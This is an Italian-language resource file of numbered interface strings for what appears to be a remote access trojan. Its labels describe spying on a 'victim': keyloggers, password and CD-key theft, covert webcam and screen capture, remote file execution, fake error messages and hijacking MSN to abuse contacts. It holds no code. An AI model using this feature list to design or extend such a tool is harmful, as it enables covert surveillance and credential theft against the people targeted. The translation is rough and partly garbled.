0 = comunicazione 
1 = password 
2 = gestire i file 
3 = tastiera 
4 = impostazioni di MSN 
5 = Gestione impostazioni 
6 = informazioni di sistema 
7 = divertimento gestore 
8 = cattura 
9 = server di proprietà 
10 = contattaci 
11 = chattare con vittima 
12 = invia un messaggio 
13 = server password 
14 = file manager 
15 = trovare i file 
16 = tastiera virtuale 
17 = on line keylogger 
18 = non in linea keylogger 
19 = opzioni Messenger 
20 = lista di contatti MSN 
21 = messaggio istantaneo 
22 = infinito giuro 
23 = impostazioni del mouse 
24 = applicazioni 
25 = impostazioni di applicazione 
26 = impostazioni di Explorer 
27 = resoulation impostazioni 
28 = sistema di ottenere informazioni 
29 = installato l'applicazione 
30 = servizi 
31 = divertimento menu 
32 = bloccaggio di schermo 
33 = webcam cattura 
34 = impostazioni del server 
35 = sito web 
36 = Circa 
37 = codificato da chi! | Who@tikkysoft.com 
38 = Pronto ... 
39 = Stato: 
40 = non in linea Keylogger 
41 = le applicazioni in esecuzione 
42 = Fake Invia Messaggio di errore 
43 = uso '|' carattere di inviare un messaggio multilinea 
44 = Messaggio Titolo: 
45 = Icona Messaggio: 
46 = Messaggio: 
47 = Messaggio Impostazioni 
48 = Messaggio Pulsanti 
49 = System Information 
50 = chattare con Vittima 
51 = Messaggi di errore 
52 = installato Applicazione Elenco 
53 = Servizi 
54 = Online Keylogger 
55 = Web Cam Capture 
56 = Menu Divertente 
57 = Impostazioni applicazione 
58 = Impostazioni server 
59 = Ottieni Server Password 
60 = impostazioni di Internet Explorer 
61 = Indirizzo: 
62 = Nome: 
63 = Scadenza: 
64 = sec. per la connessione 
65 = Chiave: 
66 = Valore: 
66 = Msg Titolo: 
67 = Messaggio: 
68 = Icona Messaggio: 
69 = Connessione: 
70 = Server Editor 
71 = webcam Capture: 
72 = Trasferimento: 
73 = Screen Capture: 
74 = Invia Messaggio immediato 
75 = Indirizzo Messenger: 
76 = Instant Message: 
77 = Ottieni Friendly Nome 
78 = Cambia nome 
79 = Impostazioni MSN Messenger 
80 = MSN Messenger Contact List 
81 = Cambia lo stato 
82 = scegliere la persona che sta per essere oggetto di abusi 
83 = Programma codificato da chi! 
84 = lista di cattive parole verranno utilizzati 
85 = Impostazioni MSN Messenger 
86 = www.tikkysoft.com 
87 = attivo / Disattivato stato 
88 = ottenere applicazioni installate elenco 
89 = salvare elenco 
90 = chiaro elenco 
91 = Server Editor 
92 = inizio chattare con vittima 
93 = smettere di chattare con vittima 
94 = chiaro di chat di testo 
95 = invia un messaggio 
96 = messaggio di prova 
97 = invia un messaggio 
98 = chiara area di testo 
99 = Instant Messenger Password 
100 = password di rete 
101 = Password Protected Storage 
102 = Mail Password 
103 = Remote Desktop password 
104 = Cd Keyler 
105 = Get System Information 
106 = Get System Information 
107 = Salva System Information 
108 = Cancella System Information 
109 = automatico 
110 = Manuale 
111 = open on line keylogger 
112 = close on line keylogger 
113 = salvare i log 
114 = log chiaro 
115 = non in linea ottenere keylogger log 
116 = salvare i log 
117 = log chiaro 
118 = Aggiorna Elenco 
119 = chiara applicazione Elenco 
120 = Inizio Servizio 
121 = Stop Service 
122 = Pausa Servizio 
123 = Riprendi Servizio 
124 = Disattivato 
125 = close 
126 = Processo Modulo 
127 = Imposta la priorità normale 
128 = Imposta priorità Pronto 
129 = Imposta la priorità alta 
130 = Imposta priorità in tempo reale 
131 = Aggiorna Elenco 
132 = Visualizza Tutte applicazioni 
133 = Massimizza selezionata 
134 = Minimizza selezionata 
135 = Marca selezionati Applicazione Visibile 
136 = Marca selezionati Applicazione Invisible 
137 = Chiudi programma selezionato 
138 = Cambia selezionata Titolo 
139 = Internet Explorer Password 
140 = Dial-Up password 
141 = inizio remoto webcam cattura 
142 = arresto remoto webcam cattura 
143 = nascondere desktop 
144 = Mostra Desktop 
145 = blocco del desktop 
146 = sbloccare desktop 
147 = barra delle applicazioni di nascondere 
148 = mostra barra delle applicazioni 
149 = barra delle applicazioni di blocco 
150 = barra delle applicazioni di sbloccare 
151 = nascondere pulsante di avvio 
152 = mostra pulsante di avvio 
153 = blocco pulsante di avvio 
154 = sbloccare pulsante di avvio 
155 = nascondere il mouse 
156 = mostra mouse 
157 = blocco del mouse 
158 = sbloccare il mouse 
159 = compito nascondere le icone 
160 = mostra compito icone 
161 = Hide orologio di sistema 
162 = Mostra orologio di sistema 
163 = Apri CD-Rom 
164 = Chiudi CD-Rom 
165 = Chiudi Monitor 
166 = Apri Monitor 
167 = arresto 
168 = riavviare 
169 = logoff 
170 = hibernate 
171 = flip schermo orizzontalmente 
172 = flip schermo verticalmente 
173 = Cambia pulsanti del mouse 
174 = Imposta i pulsanti del mouse a predefinito 
175 = Opem Num-Lock 
176 = Chiudi Num-Lock 
177 = Apri Caps-Lock 
178 = Chiudi Caps-Lock 
179 = Apri Scroll-Lock 
180 = Chiudi Scroll-Lock 
181 = Inizia Infinity Invia messaggi 
182 = Messaggio di arresto Infinity 
183 = ottenere le impostazioni del server 
184 = Salva le impostazioni del server 
185 = close server 
186 = Disinstalla server 
187 = selezionare l'icona 
188 = icona Hunter 
189 = messaggio di prova 
190 = creare server 
191 = Apri pagina Web 
192 = ottenere Internet Explorer pagina iniziale 
193 = impostare Internet Explorer pagina iniziale 
194 = ottenere msn elenco di contatti 
195 = Salva elenco di contatti msn 
196 = chiaro elenco di contatti msn 
197 = ottenere contatti online 
198 = inviare messaggi istantanei 
199 = ottenere nome 
200 = impostare nome 
201 = on-line 
202 = occupato 
203 = al di fuori 
204 = parlando al telefono 
205 = sarà di nuovo presto 
206 = il pranzo 
207 = mostrami offline 
208 = closevictim sessione 
209 = Ottieni Online Contatti 
210 = inviare cattive parole 
211 = carico giuro elenco 
212 = controllare tutti i 
213 = deseleziona tutti 
214 = giuramento elenco chiaro 
215 = Desktop 
216 = Barra delle applicazioni 
217 = Tasto Start 
218 = Mouse 
219 = Task Icone 
220 = Orologio 
221 = CD-Rom 
222 = Monitor 
223 = computer 
224 = Schermo Flip 
225 = pulsanti del mouse 
226 = num 
227 = Caps 
228 = Scorrere fino 
229 = Invia Messaggio Infinity 
230 = Icona Impostazioni 
231 = Messaggio di errore Fake 
232 = IP / DNS 
233 = Impostazioni porta 
234 = connessione Ritardo 
235 = Nome Vittima 
236 = percorso di installazione 
237 = impostazioni del Registro di sistema 
238 = modalità server 
239 = Apri pagina Web Remotelly 
240 = Per saperne di Internet Explorer pagina di avvio 
241 = cambiamento di avvio di Internet Explorer pagina 
242 = Nome Vittima 
243 = Indirizzo IP 
244 = Nome utente 
245 = Nome computer 
246 = Admin 
247 = Sistema Operativo 
248 = Cpu 
249 = Ram 
250 = Paese 
251 = Proprietà 
252 = Valore 
253 = Descrizione 
254 = Informazioni 
255 = Nome 
256 = Versione 
257 = Editore 
258 = Percorso 
259 = Nome 
260 = Nome visualizzato 
261 = Stato 
262 = avvio 
263 = Modulo 
264 = Nome 
PID = 265 
266 = Percorso 
267 = Utilizzo memoria 
268 = Priorità 
269 = Nome 
270 = Manico 
271 = Placement 
272 = PID
273 = Classe 
274 = connessione 
275 = Port
276 = Indirizzo Msn 
277 = Nome Friendly 
278 = Online Contatti 
279 = connessione 
280  = Trasferimento
281 = Schermo 
282 = WebCam 
283 = dove 
284 = Da 
285 = Dimensione 
286 = Stato 
287 = U / D 
288 = massimo 
289 = Mostra Desktop 
290 = mostra documenti 
291 = mostra Windows 
292 = mostra sistema 
293 = mostra i file di programma 
294 = mostra di avvio 
295 = leggere file di testo 
296 = imparare driver 
297 = impostare walpaper 
298 = mostra area di testo 
299 = creare una nuova cartella 
300 = cancellare il file 
301 = Elimina cartella 
302 = download 
303 = caricare 
304 = rinominare 
305 = eseguire 
306 = nascondere area di testo 
307 = refresg 
308 = Salva testo 
309 = testo in chiaro 
310 = driver 
311 = file 
312 = tipo 
313 = dimensione 
314 = attributi 
315 = File Manager 
316 = Esci 
317 = Visualizza 
318 = Screen Capture 
319 = Inizia Capture 
320 = Stop Capture 
321 = Avvia il controllo del mouse 
322 = Arresta il controllo del mouse 
323 = Schermo Intero 
324 = Minimizza 
326 = client di Active 
327 = client Disattivato 
328 = installato l'applicazione ricevente elenco ... 
329 = installato applicazione elenco risparmio ... 
330 = installato applicazione elenco salvato. 
331 = installato applicazione elenco non è stato salvato. 
332 = installato applicazione elenco di pulizia ... 
333 = installato applicazione lista pulita. 
334 = apertura di chat ... 
335 = chiusura di chat ... 
336 = pulizia chat schermo. 
337 = chat schermo è stata ripulita. 
338 = invio di messaggi istantanei .... 
339 = falso messaggio di errore di prova ... 
340 = falso messaggio di errore è stato testato. 
341 = invio falso messaggio di errore ... 
342 = pulizia area di testo ... 
343 = text zona pulita. 
344 = ricezione di Instant Messenger password .. 
345 = ricevere le password di rete .. 
346 = ricevere protette staroage password ... 
347 = password di ricevere la posta ... 
348 = ricevere desktop remoto password .. 
349 = ricevere chiavi CD ... 
350 = browser ricevere le password ... 
351 = ricevere dial-up password ... 
352 = per ricevere servizi lista ... 
353 = ricevere informazioni sul sistema ... 
354 = sistema di risparmio informazioni ... 
355 = informazioni di sistema è stato salvato. 
356 = sistema di informazioni non sono state salvate. 
357 = informazioni sul sistema di pulizia ... 
358 = sistema di informazione è stata ripulita. 
359 = impostazione servizi automaticamente 
360 = impostazione di servizi manualmente 
361 = oppenig online keylogger ... 
362 = chiusura on-line keylogger ... 
363 = risparmio keylogger log on-line ... 
364 = log on-line keylogger è stato salvato. 
365 = log on-line keylogger non è stato salvato. 
366 = pulizia keylogger log on-line ... 
367 = log on-line keylogger è stata ripulita. 
368 = non in linea receivng keylogger log di sistema, ... 
369 = non in linea risparmio keylogger log 
370 = non in linea keylogger log è stato salvato 
371 = non in linea keylogger log non è stato salvato. 
372 = non in linea pulizia keylogger log di sistema, ... 
373 = non in linea keylogger log è stata ripulita. 
374 = ricevere applicazione. 
375 = pulizia applicazione lista ... 
376 = domanda lista pulita. 
377 = selezionare un oggetto! 
378 = partire servizio ... 
379 = Smettere di servizio ... 
380 = Sostando servizio ... 
381 = Ripresa servizio ... 
382 = chiusura domanda ... 
383 = mostrando modulo ... 
384 = modulo percorso 
385 = dimensione 
386 = immagine di base 
387 = Creazione di connessione webcam ... 
388 = arresto Capture WebCam ... 
389 = Nascondere desktop ... 
390 = Risultati desktop ... 
391 = Blocco del desktop ... 
392 = Sblocco desktop .... 
393 = Barra delle applicazioni nascondere ... 
394 = Risultati Barra delle applicazioni ... 
395 = Blocco Barra delle applicazioni ... 
396 = Liberare Barra delle applicazioni ... 
397 = Nascondere pulsante di avvio ... 
398 = Risultati pulsante di avvio ... 
399 = Blocco pulsante di avvio ... 
400 = Sblocco pulsante di avvio ... 
401 = nascondere il cursore del mouse ... 
402 = mostrando cursore del mouse ... 
403 = blocco cursore del mouse ... 
404 = sbloccare il cursore del mouse ... 
405 = compito nascondere le icone ... 
406 = Risultati compito icone ... 
407 = Nascondere orologio di sistema ... 
408 = Risultati orologio di sistema ... 
409 = Oppenning CD-Rom ... 
410 = Chiusura CD-Rom ... 
411 = Chiusura monitor ... 
412 = Oppenning monitor ... 
413 = Arresto del computer in giù .. 
414 = Riavvio ... 
415 = registrazione di Windows off ... 
416 = letargo finestre off ... 
417 = Flipping schermo verticalmente ... 
418 = Flipping schermo in orizzontale ... 
419 = Cambiare i pulsanti del mouse ... 
420 = Impostazione pulsanti del mouse per impostazione predefinita ... 
421 = Blocco Num-Lock .. 
422 = Sblocco Num-Lock .. 
423 = Blocco BlocMaiusc ... 
424 = Sblocco BlocMaiusc ... 
425 = Blocco BlocScorr ... 
426 = Sblocco BlocScorr ... 
427 = Invio messaggi infinito ... 
428 = arresto messaggi infinito ... 
429 = server ricevente informazioni ... 
430 = risparmio impostazioni di un nuovo ... 
431 = server di chiusura ... 
432 = disinstallazione di server ... 
433 = aggiungendo icona ... 
434 = icona è stato aggiunto. 
435 = icona non è stato aggiunto. 
436 = Impostazioni salvate e server creato! 
437 = risparmio impostazioni del server e la creazione di server ... 
438 = questa icona non sono validi. 
439 = icona è stata selezionata. 
440 = ricevere msn elenco di contatti ... 
441 = msn elenco di contatti è stato salvato. 
442 = msn elenco di contatti non è stato salvato. 
443 = contatti online il recupero da parte delle vittime elenco di contatti 
444 = invio di messaggi istantanei a persona che hai selezionato 
445 = ottenere vittima nome 
446 = vittima cambiando nome 
447 = cambiando vittima dello status di 'on line' 
448 = cambiando vittima dello status di 'occupato' 
449 = cambiando vittima dello status di 'fuori' 
450 = cambiando vittima dello status di 'parlare al telefono' 
451 = cambiando vittima dello status di 'sarà di nuovo presto' 
452 = cambiando vittima dello status di 'aver pranzo' 
453 = cambiando vittima dello status di 'mostrare in modalità non in linea' 
454 = chiusura vittima di accesso msn ... 
455 = abusando la persona che hai selezionato da vittima elenco 
456 = installazione giuro lista ... 
457 = giuro elenco installato 
458 = giuro elenco non installato 
459 = tutti gli elementi di una lista è stato selezionato. 
460 = tutti gli elementi di una lista è stato disattivato. 
461 = giuro lista pulita. 
462 = chat oppened schermo. 
463 = chat schermo chiuso. 
464 = sistema di informazioni ricevute. 
465 = applicazione elenco reveiced 
466 = installato applicazione elenco ricevuto. 
467 = driver ricevuto. 
468 = cartella è stata eliminata. 
469 = cartella non è stato soppresso. 
470 = accoured un errore. 
471 = sistema di informazioni ricevute. 
472 = log ofline keylogger ricevuto. 
473 = vittima è online. 
474 = collegamenti ricevuti. 
475 = server password ricevuti. 
476 = web cam non trovato. 
477 = web cam driver ricevuto. 
478 = sito web collegato. 
479 = internet explorer pagina iniziale ricevuto. 
480 = internet explorer pagina iniziale è stata modificata. 
481 = ricevere keylogger log on-line ... 
482 = file di testo è stato readed. 
483 = msn elenco di contatti ricevuti. 
484 = msn contatto online elenco ricevuto. 
485 = msn nome ricevuto. 
486 = file ricevuti. 
487 = on line keylogger chiuso 
488 = on line keylogger iniziato 
489 = soppresso. 
490 = file è stato eseguito. 
491 = file è stato renemaed. 
492 = file has't stato renemaed. 
493 = uygulama calistirilamadi 
494 = file non eliminati. 
495 = sfondo cambiato. 
496 = sfondo non deve essere cambiata. 
497 = vittima cambiato il suo status di 'on line' 
498 = vittima cambiato il suo status di 'occupato' 
499 = vittima cambiato il suo status di 'fuori' 
500 = vittima cambiato il suo status di 'parlare al telefono' 
501 = vittima cambiato il suo status di 'sarà di nuovo presto' 
502 = vittima cambiato il suo status di 'aver pranzo' 
503 = vittima cambiato il suo status di 'mostrare in modalità non in linea' 
504 = vittima la sessione chiusa con successo 
505 = 505 = vittima nome è stato cambiato con successo 
506 = successo abusato della persona che hai selezionato da vittima elenco 
507 = istantanei messaggio è stato inviato. 
508 = Desktop è nascosta 
509 = Desktop è visibile 
510 = Desktop bloccato 
511 = Desktop sbloccato 
512 = barra delle applicazioni è nascosta 
513 = barra delle applicazioni è visibile 
514 = barra delle applicazioni è bloccato 
515 = barra delle applicazioni è sbloccato 
516 = pulsante di avvio è nascosta 
517 = pulsante di avvio è visibile 
518 = pulsante di avvio è bloccato 
519 = pulsante di avvio è sbloccato 
520 = cursore del mouse nascosto 
521 = cursore del mouse visibile 
522 = cursore del mouse bloccato 
523 = cursore del mouse sbloccato 
524 = compito icone sono nascoste 
525 = compito icone sono visibili 
526 = orologio nascosto 
527 = orologio visibile 
528 = CD-ROM aperto 
529 = CD-ROM chiuso 
530 = monitor chiuso 
531 = monitor aperto 
532 = shutdowned computer. 
533 = riavvio del computer. 
534 = Windows per registrarti 
535 = Windows letargo. 
536 = Schermo capovolto verticalmente 
537 = Schermo capovolto orizzontalmente 
538 = pulsanti del mouse è cambiato 
539 = pulsanti del mouse impostato di default 
540 = numlock aperto 
541 = numlock chiuso 
542 = BlocMaiusc aperto 
543 = BlocMaiusc chiuso 
544 = BlocScorr aperto 
545 = BlocScorr chiuso 
546 = infinito inviare messaggio è stato avviato. 
547 = infinito inviare messaggio è stato interrotto. 
548 = falso messaggio di errore sono stati inviati. 
549 = cartella è stata creata. 
550 = remoto di bloccaggio di schermo che istituisce ... 
551 = Remote Desktop Connection fermato 
552 = Inserisci Nome cartella: 
553 = Nuova cartella 
554 = Nuova cartella 
555 = Icona è stata salvata. 
556 = Icona non salvato. 
557 = Inserisci un nuovo nome: 
558 = Nome 
559 = non conenction! 
560 = attesa ... 
561 = download ... 
562 = file è stato scaricato. 
563 = caricamento ... 
564 = file è stato caricato. 
565 = collegato. 
566 = file ricevuti. 
567 = applicazione di ristoro lista ... 
568 = Application ingrandita 
569 = Application minimizzare 
570 = Application mostrato 
571 = Application è nascosta 
572 = Application finestra chiusa 
573 = Application Caption cambiato. 
574 = tutte le domande ricevute. 
575 = elenco dei servizi ricevuti. 
576 = processo modulo ricevuto. 
577 = elenco ricevuto applicazione. 
578 = MSN Messenger login chiusa. 
579 = si prega di selezionare un contatto 
580 = file ricevuti. 
581 = Webcam streaming fermato 
582 = Webcam non trovato. 
583 = selezionare un applicazione 
584 = Dimensione file 0 KB. 
585 = leggere file di Word 
586 = avviare il trasferimento 
587 = arresto di trasferimento 
588 = rimuovere elenco 
589 = chiaro elenco 
590 = server chiuso 
591 = Server impostazioni salvate 
592 = plug in esecuzione. 
593 = Plugin file è stato aggiunto alla lista di caricamento 
594 = si prega di selezionare un contatto 
595 = locali strumenti 
596 = successo 
597 = successo 
598 = Stampa 
599 = Stampa di un testo 
600 = Testo impostazioni 
601 = Testo Stampato 
602 = Dimensione 
603 = Grassetto 
604 = Sottolineato 
605 = Corsivo 
606 = Strikethru 

607 = Cancella Testo 
608 = Testo Stampa 
609 = stampa di testo ... 
610 = Testo è stato stampato. 
611 = Testo non è stata stampata. 
612 = Cancella Testo